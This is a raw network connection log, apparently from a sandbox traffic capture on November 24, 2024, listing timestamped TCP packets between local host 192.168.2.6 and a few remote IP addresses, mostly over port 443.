                                                                                                                                                                                              Nov 24, 2024 13:40:35.570837021 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.571032047 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.571062088 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.709065914 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.712939978 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.713037968 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.713144064 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.713144064 CET49967443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.713202000 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.713216066 CET4434996713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.716435909 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.716500998 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.716609955 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.716748953 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.716779947 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.896394014 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.899965048 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900023937 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900059938 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900111914 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900171995 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900207996 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900221109 CET49968443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.900228024 CET4434996813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.902898073 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.902951002 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:35.903039932 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.903238058 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:35.903251886 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:36.431704998 CET4970380192.168.2.6199.232.214.172
                                                                                                                                                                                              Nov 24, 2024 13:40:36.431746960 CET49701443192.168.2.620.190.181.2
                                                                                                                                                                                              Nov 24, 2024 13:40:36.551779032 CET8049703199.232.214.172192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:36.551867962 CET4970380192.168.2.6199.232.214.172
                                                                                                                                                                                              Nov 24, 2024 13:40:36.552391052 CET4434970120.190.181.2192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:36.552468061 CET49701443192.168.2.620.190.181.2
                                                                                                                                                                                              Nov 24, 2024 13:40:37.085458994 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.086575985 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.086637974 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.087197065 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.087213993 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.351802111 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.352575064 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.352641106 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.353085995 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.353101015 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.359525919 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.359958887 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.360004902 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.360336065 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.360346079 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.500152111 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.500659943 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.500741959 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.501156092 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.501172066 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.538433075 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541672945 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541820049 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541919947 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541949034 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541965008 CET49969443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.541973114 CET4434996913.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.545011044 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.545063972 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.545137882 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.545272112 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.545281887 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.692297935 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.692820072 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.692862034 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.693268061 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.693276882 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833385944 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833462000 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833563089 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833765030 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833787918 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833801031 CET49971443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.833806038 CET4434997113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.836916924 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.836965084 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.837059975 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.837224007 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.837236881 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847414970 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847451925 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847497940 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847546101 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847582102 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847832918 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847856045 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847867966 CET49970443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.847872972 CET4434997013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.850631952 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.850672007 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.850754976 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.850924969 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.850948095 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.976603031 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.976664066 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977016926 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977087975 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977499008 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977543116 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977567911 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.977950096 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.978032112 CET4434997213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.978095055 CET49972443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.980844975 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.980890989 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:37.981038094 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.981153011 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:37.981162071 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.135701895 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.135767937 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.135900974 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.135935068 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.136765957 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.136778116 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.136816978 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.137212992 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.137305021 CET4434997313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.137353897 CET49973443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.139978886 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.140028954 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:38.140106916 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.140264034 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:38.140279055 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.410718918 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.411356926 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.411376953 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.411892891 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.411905050 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.622076988 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.622865915 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.622886896 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.629053116 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.629061937 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.694360971 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.694886923 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.694901943 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.695339918 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.695346117 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.831338882 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.831885099 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.831919909 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.832317114 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.832324028 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.862821102 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.862895966 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863020897 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863065958 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863112926 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863174915 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863214970 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863255978 CET49974443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.863270998 CET4434997413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.866255999 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.866302013 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.866458893 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.866605043 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.866621017 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.984824896 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.988554955 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.988579988 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:39.988987923 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:39.988995075 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.067533970 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070431948 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070496082 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070575953 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070593119 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070606947 CET49975443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.070611954 CET4434997513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.073590040 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.073638916 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.073734999 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.073879004 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.073893070 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.151079893 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154179096 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154244900 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154330015 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154356003 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154371977 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154382944 CET49976443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.154386997 CET4434997613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.157088041 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.157130957 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.157216072 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.157354116 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.157367945 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.284384966 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.287476063 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.287585974 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.287585974 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.287616014 CET49977443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.287627935 CET4434997713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.290533066 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.290568113 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.290646076 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.290843010 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.290853977 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.447124958 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.451946020 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452012062 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452014923 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452069044 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452117920 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452136040 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452147961 CET49978443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.452152967 CET4434997813.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.455115080 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.455161095 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:40.455238104 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.455378056 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:40.455394030 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.712208033 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.714426041 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.714453936 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.714925051 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.714931965 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.852370024 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.852910995 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.852941036 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.853478909 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.853485107 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.936244011 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.936733961 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.936763048 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:41.937247038 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:41.937252998 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.073332071 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.073885918 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.073904037 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.074351072 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.074357033 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.169549942 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172743082 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172833920 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172883987 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172883987 CET49980443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172904015 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.172914028 CET4434998013.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.175683975 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.175709009 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.175790071 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.175925970 CET49985443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.175936937 CET4434998513.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.181665897 CET49705443192.168.2.620.190.181.2
                                                                                                                                                                                              Nov 24, 2024 13:40:42.242664099 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.243288040 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.243325949 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.243752956 CET49984443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.243758917 CET4434998413.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.301522017 CET4434970520.190.181.2192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.301659107 CET49705443192.168.2.620.190.181.2
                                                                                                                                                                                              Nov 24, 2024 13:40:42.313790083 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.313882113 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.313950062 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.313997030 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314023018 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314073086 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314238071 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314255953 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314265966 CET49981443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.314271927 CET4434998113.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.317553043 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.317595005 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.317688942 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.317854881 CET49986443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.317871094 CET4434998613.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.379626036 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.379822969 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.379904985 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.381185055 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.381185055 CET49982443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.381234884 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.381263971 CET4434998213.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.384577036 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.384632111 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.384712934 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.385128975 CET49987443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.385158062 CET4434998713.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.517646074 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520615101 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520685911 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520715952 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520740032 CET4434998313.107.246.63192.168.2.6
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520787001 CET49983443192.168.2.613.107.246.63
                                                                                                                                                                                              Nov 24, 2024 13:40:42.520833015 CET49983443192.168.2.613.107.246.63
